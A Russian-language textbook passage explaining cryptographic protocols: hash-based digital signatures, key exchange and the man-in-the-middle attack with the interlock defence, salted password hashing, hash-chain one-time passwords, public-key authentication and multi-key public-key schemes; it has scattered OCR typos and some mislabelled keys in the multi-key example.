На практике криптосистемы с открытым ключом не всегда эффективны при подписании документов значительного объема. В целях экономии времени можно подписывать не сам документ, а хэш-значение, вычисленное для этого документа при помощи однонаправленной хэш-функции. Участники протокола должны только заранее условиться о том, какой алгоритм шифрования с открытым ключом и какую однонаправленную хэш-функцию они будут использовать для подписания документов:

1. Антон подвергает документ хэшированию при помощи однонаправленной хэш-функции.

2. Антон шифрует вычисленное хэш-значение с использованием собственного тайного ключа, тем самым ставя под документом свою подпись, и отправляет это хэш-значение Борису в зашифрованном виде вместе с документом.

3. Борис вычисляет хэш-значение документа, расшифровывает хэш-значение, присланное ему Антоном, с использованием открытого ключа Антона. Если два полученных хэш-значения совпадают, то подпись Антона под документом верна.

Для подписания документа непременно должна быть использована однонаправленная хэш-функция, поскольку в противном случае злоумышленник Зиновий окажется в состоянии сгенерировать множество документов, хэш-значения которых совпадут. А тогда подписание Антоном одного конкретного документа станет равносильно подписанию им всех документов, имеющих такие же хэш-значения.

Кроме того, при использовании однонаправленных хэш-функций для подписания документов подпись можно хранить отдельно. А следовательно в архиве, в котором данный протокол применяется для проверки подлинности подписи, достаточно хранить только зашифрованные хэш-значения файлов. При возникновении разногласий относительно авторства документа достаточно найти в архиве соответствующее шифрованное хэш-значение, расшифровать его и проверить, совпадает ли оно с хэш-значением, вычисленным для спорного документа.

Дополнительная терминология

Криптографы придумали множество алгоритмов цифровой подписи. Все они основаны на криптосистемах с открытым ключом. При этом секретная информация используется для того, чтобы поставить подпись под документом, а общедоступная — чтобы проверить подлинность этой подписи. Поэтому часто процесс подписания документа называют шифрованием на тайном ключе, а процесс проверки подлинности подписи — расшифрованием на открытом ключе. Однако это справедливо только для одного алгоритма шифрования с открытым ключом — RSA, а подавляющее большинство остальных алгоритмов цифровой подписи совершенно непригодны для шифрования сообщений.

По этой причине в ходе дальнейшего изложения о процессах подписания документа и проверки подлинности подписи будет говориться без упоминания конкретных алгоритмов, которые используются для этих целей. Подписание документа Р при помощи тайного ключа К будет обозначаться S К (P), а проверка подлинности подписи с использованием соответствующего открытого ключа — V К (P).

Битовая строка, которая присоединяется к документу при его подписании (например, хэш-значение файла, зашифрованное на тайном ключе) будет именоваться цифровой подписью. И наконец, протокол, при помощи которого получатель сообщения убеждается в подлинности и целостности этого сообщения, будет называться аутентифнкационным протоколом.

Несколько подписей под одним документом

Каким образом Антон и Борис могут поставить свои цифровые подписи под одним и тем же документом? Если не задействовать однонаправленные хэш-функции, существуют 2 способа сделать это.

  • Первый заключается в создании двух идентичных копий документа, одну из которых подписывает Антон, а другую — Борис. Однако тогда придется хранить документ, длина которого в 2 раза превышает размер исходного документа, предназначенного для совместного подписания Антоном и Борисом.
  • Второй способ состоит в том, чтобы сначала документ подписал Антон, а затем подпись Антона заверил своей подписью Борис. Но в этом случае будет невозможно убедиться в подлинности подписи Антона, не проверив подпись Бориса.

Если использовать однонаправленную хэш-функцию, от перечисленных недостатков можно легко избавиться:

1. Антон подписывает хэш-значение документа.

2. Борис подписывает хэш-значение того же самого документа.

3. Борис отсылает свою подпись Антону.

4. Антон шлет документ вместе со своей подписью и подписью Бориса Владимиру.

5. Владимир проверяет подлинность подписей Антона и Бориса.

Неоспоримость

Вполне возможна ситуация, при которой Антон, подписав некоторый документ, впоследствии попытается ее оспорить — заявит о том, что подпись под документом поставил не он. Причиной может послужить, например. потеря Антоном своего тайного ключа в людном месте или намеренная его публикация Антоном в разделе частных объявлений популярной газеты. Эта ситуация называется отказ от обязательств.

Уменьшить ущерб отказа от обязательств помогает введение в подпись даты и времени, когда она была поставлена под документом. Конечно, ничего нельзя поделать в случае, если Антон заранее предпринял определенные действия для создания условий, при которых его подпись под документом должна быть признана недействительной. Но можно, по крайней мере, сделать так, чтобы эти действия не позволили Антону объявить поддельными все остальные его подписи, которые он ранее поставил под другими документами:

1. Антон подписывает документ.

2. Антон генерирует заголовок, в который помещает свои личные данные. присоединяет этот заголовок к подписанному им документу, еще раз подписывает итоговый документ и посылает его Дмитрию.

3. Дмитрий проверяет вторую подпись Антона, добавляет к его сообщению отметку о дате и времени получения этого сообщения, подписывает его. а затем отправляет Антону и Борису.

4. Борис проверяет подпись Дмитрия, персональные данные Антона и его подпись.

5. Антон знакомится с содержанием сообщения, присланного Дмитрием Если Антон обнаруживает в этом сообщении что-то подозрительное, он должен немедленно заявить об этом во всеуслышание.

3. Цифровая подпись и шифрование

Цифровая подпись и шифрование

Аналогии из повседневной жизни помогают лучше понять, как должны быть устроены криптографические протоколы, чтобы обеспечивать максимальную защиту от мошенников и злоумышленников. Возьмем, к примеру. обыкновенное письмо, приготовленное Антоном для отправки Борис) по почте. Антон всегда подписывает свои письма Борису, прежде чем вкладывает их в конверты. А почему бы Антону не подписывать сами конверты? Да потому, что получив конверт с подписью Антона и обнаружив в нем неподписанное письмо, Борис не сможет убедиться в том, что подлинное письмо Антона не было подменено на пути следования от отправителя к адресату.

Аналогичная ситуация сложилась и в криптографии: если Антон хочет послать шифрованное сообщение, завизированное своей подписью, то ему лучше сначала подписать открытый текст этого сообщения и только затем зашифровать его вместе с поставленной пол ним подписью.

1. Антон подписывает сообщение Р при помощи своего тайного ключа К А:

S K A (P)

2. Антон шифрует подписанное сообщение, используя открытый ключ Бориса К Б , и посылает его Борису

Е K Б ( S K A (P) )

3. Борис расшифровывает сообщение Антона с помощью своего тайного ключа К Б :

D K Б ( Е K Б ( S K A (P) ) ) = S K A (P)

4. С помощью открытого ключа Антона К А, Борис проверяет подпись Антона и получает открытый текст его сообщения:

V K A (S K A (P) ) = Р

В результате подпись становится неотъемлемой частью сообщения (злоумышленник не может вместо шифрованного сообщения подставить свое собственное, сохранив под ним подлинную подпись отправителя). Кроме того, отправитель видит открытый текст сообщения, когда ставит под ним свою подпись.

Антон может использовать разные ключи для зашифрования документа и для того, чтобы поставить под ним подпись. Это позволит ему при необходимости передать ключ шифрования правоохранительным органам, не компрометируя собственную подпись, а также по своему выбору отдать один из двух ключей на хранение доверенным третьим лицам, сохранив второй и тайне от посторонних.

Однако совместное использование шифрования и цифровой подписи таит в себе особую опасность, если для зашифрования и генерации цифровой подписи используется один и тот же криптографический алгоритм. Рассмотрим для примера протокол, согласно которому после приема сообщения Борис немедленно должен послать отправителю этого сообщения подтверждение о его получении.

1. Антон подписывает сообщение при помощи своего тайного ключа, шифрует это сообщение, используя открытый ключ Бориса, и посылает его Борису:

Е K Б ( S K A (P) )

2. Борис расшифровывает сообщение Антона на своем тайном ключе, удостоверяется в подлинности подписи Антона с помощью его открытого ключа и восстанавливает открытый текст сообщения:

S K A (D K Б K Б ( S K A (P) ) ) ) = P

3. Борис подписывает сообщение Антона с использованием своего тайного ключа, шифрует это сообщение вместе со своей подписью на открытом ключе Антона и отсылает обратно:

Е K A ( S K Б (P) )

4. Антон расшифровывает сообщение Бориса при помощи своего тайного ключа и проверяет подлинность подписи Бориса, используя его открытый ключ. Если в результате он получит сообщение, идентичное тому, которое он ранее отправил Борису, значит, сеанс связи прошел корректно.

К сожалению, если для шифрования и проверки цифровой подписи применяется одинаковый криптографический алгоритм (т. е., V K = E К и S К = D К ), Зиновий, являясь законным пользователем сети связи, при определенных условиях сможет читать шифрованную переписку Антона. Для этого, перехватив сообщение Антона Е K Б ( S K A (P) ) , Зиновий шлет его от своего имени Борису. Борис после расшифрования и проверки цифровой подписи Зиновия получит:

E K З (D K Б K Б ( D K A (P) ) ) ) = E K З (D K А (P) )

В соответствии с протоколом Борис должен отправить Зиновию подтверждение правильности приема пришедшего ему сообщения:

В результате Зиновию останется только преобразовать сообщение, присланное ему Борисом, при помощи своего тайного ключа и известных открытых ключей Антона и Бориса — и вот он, заветный открытый текст Р сообщения, отправленного Антоном!

Конечно, все это стало возможным не только потому, что для шифрования и проверки цифровой подписи использовался один и тот же криптографический алгоритм. Борису следовало бы быть более внимательным и не отсылать подтверждение правильности приема сообщения, присланного Зиновием. Попытка расшифровать это сообщение привела к тому, что Борис получил открытый текст, не имеющий никакого смысла.

Отсюда вывод. Ни в коем случае не пытайтесь подписывать или шифровать произвольные сообщения, а затем делиться полученными результатами с другими людьми. Это для вас может плохо кончиться.

4. Основные криптографические протоколы

Основные криптографические протоколы

Обмен ключами

Распространенным приемом в криптографии является шифрование каждого передаваемого сообщения с помощью отдельного ключа. Такой ключ называется сеансовым, поскольку используется только на протяжении одного сеанса связи. Каким образом сеансовый ключ попадает в распоряжение отправителя и получателя шифрованного сообщения?

Обмен ключами для симметричных криптосистем

Предположим, что Антон и Борис, являющиеся пользователями компьютерной сети, получили секретные ключи от Дмитрия (доверенного липа, наделенного правами арбитра). Секретные ключи попали к Антону и Борису еще до начала сеанса связи, а злоумышленник Зиновий ровным счетом ничего не знает о том, какие это ключи. Тогда для обмена шифрованными сообщениями по компьютерной сети Антон и Борис могут воспользоваться следующим криптографическим протоколом:

1. Антон связывается с Дмитрием и запрашивает у него сеансовый ключ для связи с Борисом.

2. Дмитрий генерирует случайный сеансовый ключ и создает две шифрованных копии этого ключа — один раз Дмитрий шифрует сеансовый ключ с помощью секретного ключа Антона, второй — с помощью секретного ключа Бориса. Затем Дмитрий отсылает обе копии Антону.

3. Антон расшифровывает свою копию сеансового ключа.

4. Антон отправляет Борису его копию сеансового ключа.

5. Борис расшифровывает свою копию сеансового ключа.

6. Антон отправляет Борису сообщение, зашифрованное с использованием сеансового ключа, копия которого имеется у них обоих.

И Антон, и Борис полностью полагаются на честность Дмитрия. Если Зиновию удастся его подкупить или обмануть, ни о какой секретности обмена сообщениями между Антоном и Борисом не может быть и речи. В этом ел у чае Зиновий получит доступ ко всем ключам, используемым абонентами компьютерной сети, и сможет прочесть шифрованные сообщения, которыми они обмениваются по сети. Для этого Зиновию достаточно аккуратно копировать всю передаваемую через нее информацию.

Другой существенный недостаток этого протокола состоит в том, что арбитр является потенциальным узким местом в обмене сообщениями между Антоном и Борисом. Если Дмитрий по какой-либо причине не сможет вовремя снабдить их ключами, шифрованная связь между ними будет прервана.

Обмен ключами для криптосистем с открытым ключом

Обычно Антон и Борис используют криптографический алгоритм с открытым ключом, чтобы договориться о сеансовом ключе, при помощи которого они будут шифровать свои данные. В этом случае протокол обмена сеансовыми ключами значительно упрощается, и Антон может послать шифрованное сообщение Борису, даже если Борис и не слышал о существовании Антона:

1. Антон находит открытый ключ Бориса в справочнике, в базе данных или получает его от Дмитрия.

2. Антон генерирует случайный сеансовый ключ, шифрует его при помощи открытого ключа Бориса и отправляет ему в зашифрованном виде.

3. Борис расшифровывает сообщение Антона с использованием своего тайного ключа.

4. Антон и Борис обмениваются сообщениями, зашифрованными на одном и том же сеансовом ключе.

Атака методом сведения к середине

Петр, возможности которого ограничены лишь перехватом передаваемых сообщений, может попытаться вскрыть применяемый криптографический алгоритм с открытым ключом или организовать атаку со знанием только шифртекста. По сравнению с Петром у Зиновия выбор гораздо богаче: он ' может не только "подслушивать" за Антоном и Борисом, но также видоизменять и даже уничтожать сообщения, которыми они обмениваются между собой. Более того, Зиновий может перевоплотиться в Антона, когда общается с Борисом. Он также может попытаться выдать себя за Бориса, вступая в контакт с Антоном. При этом Зиновий может действовать, например, следующим образом:

1. Антон посылает Борису свой открытый ключ. Зиновий перехватывает этот ключ, а вместо него отсылает Борису свой собственный открытый ключ.

2. Борис посылает Антону свой открытый ключ. Зиновий перехватывает лог ключ, а вместо него отсылает Антону свой собственный открытый ключ.

3. Антон шлет Борису сообщение, зашифрованное с помощью открытого ключа, который Антон ошибочно считает принадлежащим Борису. Зиновий перехватывает это сообщение, расшифровывает его при помощи своего тайного ключа, произвольным образом изменяет его, снова зашифровывает на открытом ключе Бориса и затем отсылает адресату.

4. Борис шлет Антону сообщение, зашифрованное с помощью открытого ключа, который Борис ошибочно считает принадлежащим Антону. Зиновий перехватывает это сообщение, расшифровывает его при помощи своего тайного ключа, произвольным образом изменяет его, снопа зашифровывает на открытом ключе Антона и затем отсылает адресат.

Даже если в процессе обмена сообщениями Антон и Борис не передают свои открытые ключи по каналам связи, а просто извлекают их из базы данных, Зиновий может оказаться в состоянии перехватывать запросы в эту базу данных и подменять открытые ключи Антона и Бориса своими собственными. А еще Зиновий может проникнуть в базу данных, где хранятся открытые ключи Антона и Бориса, заменить их на свои собственные, а затем преспокойно дожидаться, пока Антон и Борис не захотят обменяться сообщениями.

Такая атака методом сведения к середине стала возможна потому, что Антон и Борис не в состоянии достоверно убедиться в том, что общаются друг с другом напрямую. И если, модифицируя сообщения Антона и Бориса. Зиновий научится делать это с такой быстротой, что задержка в передаче сообщений будет незаметной, ни Антон, ни Борис так никогда и не догадаются, что кто-то вклинился между ними и читает всю их якобы секретную переписку.

Блокировочный протокол

Блокировочный протокол, изобретенный американскими криптологами Р. Райвестом и А. Шамиром, позволяет существенно осложнить жизнь Зиновию и ему подобным личностям:

1. Антон посылает Борису свой открытый ключ.

2. Борис посылает Антону свой открытый ключ.

3. Антон зашифровывает свое сообщение и отсылает половину этого сообщения Борису.

4. Борис зашифровывает свое сообщение и отсылает половину этого сообщения Антону.

5. Антон отсылает вторую половину своего сообщения Борису.

6. Борис расшифровывает сообщение Антона с помощью своего тайного ключа. Борис отсылает вторую половину своего сообщения Антону.

7. Антон расшифровывает сообщение Бориса с помощью своего тайного ключа.

Необходимо, чтобы одну часть сообщения, посланного Антоном или Борисом, нельзя было прочитать, не имея на руках другой его части. Тогда Борис не сможет прочитать сообщение Антона до тех пор, пока не дойдет до шага 6 блокировочного протокола, а Борис не сможет ознакомиться с сообщением Антона до шага 7. Существует несколько способов добиться этого:

  • если для шифрования используется блочный криптографический алгоритм, то первую часть отсылаемого сообщения можно, например, составить из первых половин блоков шифртекста, а вторую — из вторых;
  • расшифрование сообщения можно поставить в зависимость от случайного битового вектора, который отсылается вместе со второй частью сообщения;
  • первая часть сообщения представляет собой хэш-значение, полученное для шифртекста этого сообщения, а вторая часть содержит собственно сам шифртекст.

На шаге 1 блокировочного протокола Зиновий по-прежнему может подставить свой собственный открытый ключ вместо открытого ключа Антона. Однако теперь на шаге 3 Зиновий будет не в состоянии дешифровать перехваченное сообщение Антона и зашифровать его заново при помощи открытого ключа Бориса. Зиновию непременно придется придумать свое собственное сообщение (случайный битовый вектор или хэш-значение) и послан, его половину Борису. То же самое касается и сообщения Бориса Антону. которое Зиновий перехватит на шаге 4 блокировочного протокола. А после того как Зиновий получит в свое распоряжение вторые половины подлинных сообщений Антона и Бориса, будет уже слишком поздно изменить придуманные им ранее фальшивые сообщения, которые он уже отослал от их имени. Следовательно, Зиновию придется дать волю своей фантазии и продолжить вести всю переписку от имени Антона и Бориса.

  Конечно, может случиться так, что, у Зиновия очень живое воображение и что, он весьма близко знаком с Антоном и Борисом. В результате они никогда не заподозрят, что на самом деле общаются не друг с другом, а с Зиновием. Однако в любом случае Зиновию будет значительно труднее, чем тогда, когда Антон и Борис используют обычный, а не блокировочный протокол.

Протокол обмена ключами с цифровой подписью

При обмене сеансовыми ключами атаку методом сведения к середине можно попытаться отразить также с помощью цифровой подписи. В этом случае Антон и Борис получают сеансовые ключи, подписанные Дмитрием, который является доверенным лицом, наделенным правами арбитра. Каждый сеансовый ключ снабжается свидетельством о его принадлежности определенному лицу. Получая от Дмитрия ключ, Антон и Борис могут проверить его подпись и убедиться, что этот ключ принадлежит именно тому человеку, которому они собираются послать сообщение.

В результате Зиновию придется весьма несладко. Он не сможет выдать себя   за Антона или Бориса, поскольку не знает их тайных ключей. Зиновий будет лишен возможности подменить открытые ключи Антона и Бориса на свои собственные, поскольку в его распоряжении есть только сеансовые ключи с подписью Дмитрия, удостоверяющей их принадлежность Зиновию.

Зиновию остается только перехватывать шифрованные сообщения, которыми обмениваются Антон и Борис, и пытаться их читать с помощью криптоаналитических методов.

Однако следует отметить, что в протоколе обмена сеансовыми ключами с цифровой подписью появился новый участник — Дмитрий. Если Зиновий сумеет перевоплотиться в Дмитрия, он сможет подписывать и навязывать участникам протокола известные ему фальшивые сеансовые ключи. Таким образом, несмотря ни на что, у Зиновия все же остается возможность атаковать этот протокол, воспользовавшись методом сведения к середине.

Одновременная передача ключа и сообщения

Антон и Борис совершенно необязательно передают друг другу сеансовые ключи перед тем, как приступить к обмену сообщениями. Вместо этого они могут воспользоваться следующим протоколом:

1. Антон генерирует случайный сеансовый ключ Кис помощью него зашифровывает сообщение М, получая в результате Е К (М).

2. Антон извлекает открытый ключ Бориса В из базы данных.

3. Антон шифрует сеансовый ключ К при помощи В, получая в результате Е В (К) .

4. Антон посылает Борису Е к (М) и Е в (К).

5. Борис расшифровывает сеансовый ключ К с помощью своего тайного ключа.

6. Борис расшифровывает сообщение Антона на сеансовом ключе К.

Данный протокол наглядно демонстрирует использование современных гибридных криптосистем на практике. Для достижения большей стойкости в него может быть добавлена цифровая подпись, а также применены другие приемы, которые помогут сделать его более стойким против различных атак.

Множественная рассылка ключей и сообщений

Почему бы Антону не послать шифрованное сообщение сразу нескольким адресатам? Он может сделать это, например так:

1. Антон генерирует случайный сеансовый ключ Кис его помощью зашифровывает сообщение М, получая в результате Е К (М).

2. Антон извлекает открытые ключи Бориса, Владимира и Георгия из базы данных.

3. Антон шифрует К при помощи открытых ключей Бориса, Владимира и Георгия, получая в результате Е Б (К), Е в (К)и Е г (К).

4. Антон, посылает шифрованное сообщение Е к (М), а также многократно зашифрованный сеансовый ключ (E Б (K), Е в (К)и Е Г (К)) всем, кто пожелает их получить.

5. Только Борис, Владимир и Георгий смогут расшифровать сеансовый ключ К при помощи своих тайных ключей.

6. Только Борис, Владимир и Георгий смогут прочесть шифрованное сообщение Антона с помощью сеансового ключа К.

5. Аутентификация

Когда Антон проходит процедуру регистрации для получения доступа к глобальной компьютерной сети Internet, каким образом информационно-коммерческая служба, услугами которой он пользуется, узнает, что это именно Антон, а не Зиновий, пытающийся бесплатно (за счет Антона) попутешествовать по Всемирной паутине? Чаще всего эта проблема решается при помощи пароля: Антон должен ввести некую секретную информацию. известную только ему и его поставщику услуг Internet. Причем вводить эту информацию надо каждый раз при прохождении процедуры регистрации.

Аутентификация при помощи однонаправленных функций

На сервере, который проверяет правильность введенного Антоном пароля. совершенно не обязательно хранить пароли пользователей. Достаточно научить сервер отличать правильные пароли от неправильных. Это легко сделать При помощи однонаправленных функций. Тогда на сервере будут присутствовать не сами пароли, а их хэш-значения:

1. Антон посылает на сервер свой пароль.

2. С помощью однонаправленной функции сервер вычисляет хэш-значение для присланного Антоном пароля.

3. Сервер сравнивает вычисленное хэш-значение с эталоном, который хранится в его памяти, и делает вывод о правильности пароля Антона.

Поскольку при такой схеме аутентификации пользователей уже не требуется держать пароли на сервере, то опасаться, что кто-либо взломает защиту сервера и украдет файл с паролями, нет никаких причин. Список хэш-значений, соответствующих паролям зарегистрированных пользователей. совершенно бесполезен для Зиновия, т. к. найти пароль по его yjiii-значению путем обращения однонаправленной функции ему не удастся.

Отражение словарной атаки при помощи "изюминок"

Файл с хэш-значениями, полученными из паролей, может подвергнуться словарной атаке. Составив словарь примерно из 1 млн самых распространенных паролей, Зиновий применит к ним хэш-функцию. В результате он получит файл объемом до 10 Мбайт, который уместится на нескольких дне кетах. Далее Зиновий украдет с сервера файл с паролями, зашифрованными с помощью хэш-функции, и сравнит его со своим файлом, содержащим хэш-значения для самых часто используемых паролей. Совпадающие хэш-значения позволят Зиновию определить некоторые из паролей.

Отразить словарную атаку помогает введение в схему аутентификации зарегистрированных пользователей так называемых изюминок. "Изюминка представляет собой случайную битовую строку, которая присоединяется к паролю прежде, чем к нему будет применена хэш-функция. Затем на сервере запоминается как вычисленное хэш-значение, так и соответствующая ему "изюминка".

Если количество возможных "изюминок" достаточно велико, от словарной атаки мало толку. Зиновий должен будет вычислять хэш-значение не только для каждого пароля, но и для каждой "изюминки". Смысл введения "изюминок" в схему аутентификации пользователей состоит в том. чтобы заставить злоумышленника совершать пробное шифрование всех паролей. входящих в составленный им словарь, каждый раз, когда он пытается вскрыть какой-либо отдельный пароль, вместо того чтобы заранее вычислить хэш-значения этих паролей, а затем просто сравнивать полученные значения с эталонными, украденными с сервера.

"Изюма" понадобится много. Во многих версиях операционной системы UNIX используются "изюминки" длиной 12 бит. Этого явно недостаточно: существуют программы, которые при помогли словарной атаки позволяют за неделю вскрыть от 30 до 40% всех паролей, применяемых пользователями UNIX.

Таким образом, схема аутентификации с "изюминками" не может служить панацеей. Она обеспечивает защиту только от словарной атаки всего файла с паролями, зашифрованными с помощью однонаправленной функции. Однако эта схема бессильна, когда мощной и слаженной атаке подвергается отдельный пароль конкретного пользователя.

Схема аутентификации с "изюминками" эффективна и тогда, когда при регистрации на разных серверах используется один и тот же пароль. Но если пароль плохой, лучше он все равно не станет, каким бы количеством "изюма" для его защиты вы ни запаслись.

Периодическая сменяемость паролей

Даже при наличии "изюминок" схема аутентификации пользователей путем проверки их паролей имеет один очень серьезный недостаток. Ведь не исключено, что линия связи, соединяющая персональный компьютер Антона с сервером информационно-коммерческой службы, проходит по территориям 33-х стран, законодательство которых по-разному трактует права своих и иностранных граждан на сохранение в тайне их личной переписки. И поэтому узнать пароль Антона, в принципе, может любой, кто сумеет подключиться к этой линии связи или обратиться в память сервера и узнать пароль. прежде чем для него будет вычислено соответствующее хэш-значение. Чтобы уменьшить ущерб от компрометации пароля, его следует периодически менять. Делается это следующим образом.

Антон генерирует случайное число R и пересылает его серверу, который вычисляет, исходя из этого числа и однонаправленной функции f значения x 1 = f (R), x 2 =f (f (R)), x 3 = f (f (f(R))) и т.д. 101 раз. Первые 100 вычисленных значений x 1 , х 2 , . . , x 100 передаются Антону в качестве списка паролей, который он должен хранить в тайне. A x 101 запоминается на сервере.

Теперь, когда Антон захочет зарегистрироваться для работы на сервере, ему достаточно ввести свое имя и число х 100 . Сервер вычислит f(x 100 ) и сравнит его с х 101 . В случае совпадения Антону будет разрешен доступ к серверу, который затем заменит х 101 на х 100 . А Антон вычеркнет х 101 из своего списка паролей.

В следующий раз, когда Антон снова захочет получить доступ к серверу, он найдет в списке паролей следующее по порядку не зачеркнутое значение х j . Сервер вычислит f(x j ) и сравнит с запомненным X j+ 1 .

Злоумышленник Зиновий, взломавший сервер, все равно не сможет узнать очередной пароль Антона x j по хранимому на сервере значению x j+l, поскольку функция f является однонаправленной. По той же самой причине. даже если Зиновий перехватит x j , это позволит ему зарегистрироваться под именем Антона всего лишь один раз. А значения x 1 , x 2 , ... , х j -1 так и останутся для Зиновия тайной за семью печатями при условии, что Антон достаточно ответственно относится к хранению списка паролей, полученного им с сервера.

Аутентификация при помощи криптосистем с открытым ключом

Ни "изюминки", ни периодически сменяемый пароль не гарантируют защиту от злонамеренных действий Петра, перехватывающего все сообщения Антона, которые тот пересылает по линии связи, соединяющей его с сервером. Решить эту проблему помогает применение криптографии с открытым ключом.

Предполагается, что на сервере имеется файл, в котором хранятся открытые ключи всех пользователей. В первом приближении криптографический протокол, который позволяет производить аутентификацию пользователей выглядит так:

1. Сервер генерирует случайную битовую строку и посылает ее Антону.

2. Антон шифрует эту строку при помощи своего тайного ключа и отсылает обратно на сервер.

3. На сервере производится расшифрование сообщения, пришедшего от  Антона, с помощью его открытого ключа.

4. Если полученный в результате открытый текст идентичен случайной битовой строке, ранее посланной Антону, последний получает доступ к серверу.

Поскольку только Антон знает свой тайный ключ, никто не сможет выдать себя за Антона. Этот тайный ключ, скорее всего, представляет собой длинную битовую строку, которую очень трудно воспроизводить по памяти, и поэтому в распоряжении Антона должен быть интеллектуальный терминал. надежно защищенный от взлома и способный автоматически осуществлять набор требуемого тайного ключа при шифровании сообщений. Однако несмотря на это дополнительное условие, важнее всего то, что тайный ключ Антона не требуется передавать на сервер ни под каким видом. Следовательно, для надежной аутентификации пользователей совсем не обязательно наглухо защищать от подслушивания канал связи, соединяющий терминал Антона с сервером. Да и информация о пользователях, хранимая на сервере, может быть безо всякой опаски сделана доступной для всех, кто пожелает с ней ознакомиться.

Конечно, со стороны Антона глупо шифровать на своем тайном ключе произвольную битовую последовательность, причем вне зависимости от ее происхождения. Поэтому на практике для аутентификации пользователей обычно используется более сложный криптографический протокол:

1. Антон производит некоторые специальные вычисления на основе предварительно сгенерированной им случайной битовой последовательности и своего тайного ключа. Затем он отсылает вычисленные им значения на сервер.

2. Сервер посылает Антону случайную битовую последовательность, отличную от той, которая была задействована Антоном на шаге 1.

3. Антон производит некоторые специальные вычисления на основе обеих случайных битовых последовательностей (сгенерированной им самим, а также полученной с сервера) и своего тайного ключа. Затем он отсылает вычисленные значения на сервер.

4. На сервере производятся некоторые специальные вычисления на основе присланных Антоном значений и его открытого ключа, чтобы убедиться в том, что именно он является обладателем соответствующего тайного ключа.

5. Если проверка дает положительный результат, Антону разрешается доступ к серверу.

Если Антон, в свою очередь, не доверяет серверу в такой же степени, в какой сервер не доверяет ему, то он может потребовать, чтобы сервер аналогичным образом "удостоверил свою личность", воспользовавшись тем же самым протоколом.

6. Формальный анализ криптографических протоколов

Криптографические протоколы, предназначенные для аутентификации и обмена ключами, играют очень важную роль в обеспечении надежного функционирования современных компьютерных систем. Усилиями криптологов было создано много таких протоколов, однако по прошествии времени выяснилось, что не все из них позволяют должным образом защитить компьютерную систему от несанкционированного доступа и предотвратить компрометацию ключей. Причем для некоторых протоколов этот временной промежуток оказался довольно значительным и растянулся на несколько лет. Как следствие, возникла настоятельная потребность в разработке формальных методов, которые позволили бы находить изъяны в криптографических протоколах в более короткие сроки. И хотя большинство из этих методов являются универсальными и могут быть использованы для анализа произвольных криптографических протоколов, особое внимание изначально стало уделяться именно протоколам, позволяющим производить аутентификацию пользователей и обмен ключами.

К настоящему времени имеется 4 основных подхода к анализу криптографических протоколов. Первый из них применяет верификационные методы, которые не были специально разработаны для анализа криптографических протоколов. Некоторые из этих методов представляют протоколы в виде конечных автоматов, другие распространяют на них теорию исчисления предикатов первого порядка.

Второй подход заключается в использовании экспертных систем, позволяющих определить, возникают ли в ходе выполнения шагов протокола такие нежелательные события, как компрометация ключа или разглашение пароля. Этот подход дает возможность эффективнее находить в криптографических протоколах конкретные изъяны, однако никоим образом не гарантирует полного отсутствия таковых.

Авторами третьего подхода являются американские криптологи М. Бэрроуз. М. Абади, Р. Нидхэм (М. Burrows, M. Abadi, R. Needham). Они разработали формальную логическую модель, названную по первым буквам их фамилий БАН-логикой (BAN-logic). Составить с ее помощью общее представление о надежности криптографического протокола нельзя. Однако основное преимущество БАН-логики перед другими подходами заключается в том, что она состоит из набора простых логических правил, которые легко применяются на практике и весьма полезны при обнаружении отдельных изъянов в анализируемых протоколах.

При четвертом подходе выполнение шагов протокола моделируется с помощью алгебраической системы, которая строится исходя из знаний, имеющихся у участников протокола относительно этого протокола. Затем построенная алгебраическая модель подвергается формальному анализу на предмет достижимости некоторых из ее состояний.

В целом формальный анализ криптографических протоколов пока является довольно новой и до конца не сформировавшейся областью криптологии, и поэтому делать далеко идущие выводы о превосходстве какого-то одного из перечисленных четырех подходов еще рановато. Поживем — увидим.

7. Многоключевая криптография с открытым ключом

Многоключевая криптография с открытым ключом

В криптографии с открытым ключом используются 2 ключа, один из которых применяется для зашифрования сообщений, а другой — для расшифрования. Вместо этого можно задействовать любое количество ключей. Рассмотрим для примера трехключевую криптосистему с открытым ключом.

Имеется три ключа К А , К Б и К С , которые распределены между участниками процесса обмена сообщениями следующим образом:

Антон           К А

Борис            К Б

Владимир     К В

Георгий        К А и К Б

Денис           К Б и К В

Евгений        К В и К А

Если Антон зашифрует свое сообщение с помощью ключа К А, расшифровать его смогут либо Денис, либо Борис совместно с Владимиром, которые имеют в своем распоряжении К Б и К В . Сообщение, зашифрованное Борисом, сможет прочесть Евгений. Владимир может зашифровать сообщение, которое в состоянии прочесть Георгий. Сообщение, зашифрованное Георгием при помощи ключа К А , смогут прочесть Денис. Если Георгий воспользуется ключом кб, то его сообщение прочитает Евгений, а если применит кб и кб, то с этим сообщением сможет ознакомиться Владимир. Аналогичным образом может .зашифровать свое сообщение Денис, и тогда его прочтут либо Антон, либо Георгий, либо Евгений. Всевозможные сочетания ключей шифрования и расшифрования перечислены в табл. 7.2.

Таблица 7.2. Сочетания ключей шифрования и расшифрования в трехключевой криптосистеме с открытым ключом


Зашифровано с помощью ключей: Расшифровывается с помощью ключей:
К А К Б и К В
К Б К А и К В
К С К А и К Б
К А и К Б К В
К А и К В К Б
К Б и   К В К А

Множественная рассылка шифрованных сообщений

Допустим, что требуется рассылать групповые шифрованные сообщения 100 различным абонентам компьютерной сети связи, причем заранее неизвестно какие конкретно сообщения надо будет послать отдельным группам этих абонентов. В такой ситуации можно выдать каждому абоненту свой ключ и шифровать все сообщения отдельно. В результате придется зашифровать и послан, слишком много сообщений. Можно снабдить каждого абонента ключами. число которых равняется количеству различных групп, составленных из 100 абонентов. Но тогда потребуется слишком много ключей (порядка 2 100 ) .

Выход из положения позволяет найти многоключевая криптография с открытым ключом. Предположим, что в компьютерной сети связи имеются всего 3 абонента — Антон, Борис и Владимир. Каждый из них получит по 2 ключа: Антон — К А и К Б , Борис — К Б и К В , Владимир — К А и К В . Тогда если потребуется послать сообщение для Антона, его надо зашифровать с помощью К С . Сообщение, предназначенное Борису, следует зашифровать при помощи К А . А если сообщение должен прочесть только Владимир, необходимо использовать К Б . Сообщение для Антона и Бориса шифруется на ключах К А и К В , для Антона и Владимира — на К Б и   К В , для Бориса и Владимира — на К А и К Б .

В случае трех абонентов эта схема множественной рассылки сообщений группам абонентов выглядит не слишком впечатляюще, но при 100 абонентах ее преимущества становятся очевидны. Вместо порядка 2 100 ключей абонентам сети надо раздать всего 100 ключей, и посылать требуется всего одно шифрованное сообщение, а не n , где n — количество абонентов в группе ( n >1).

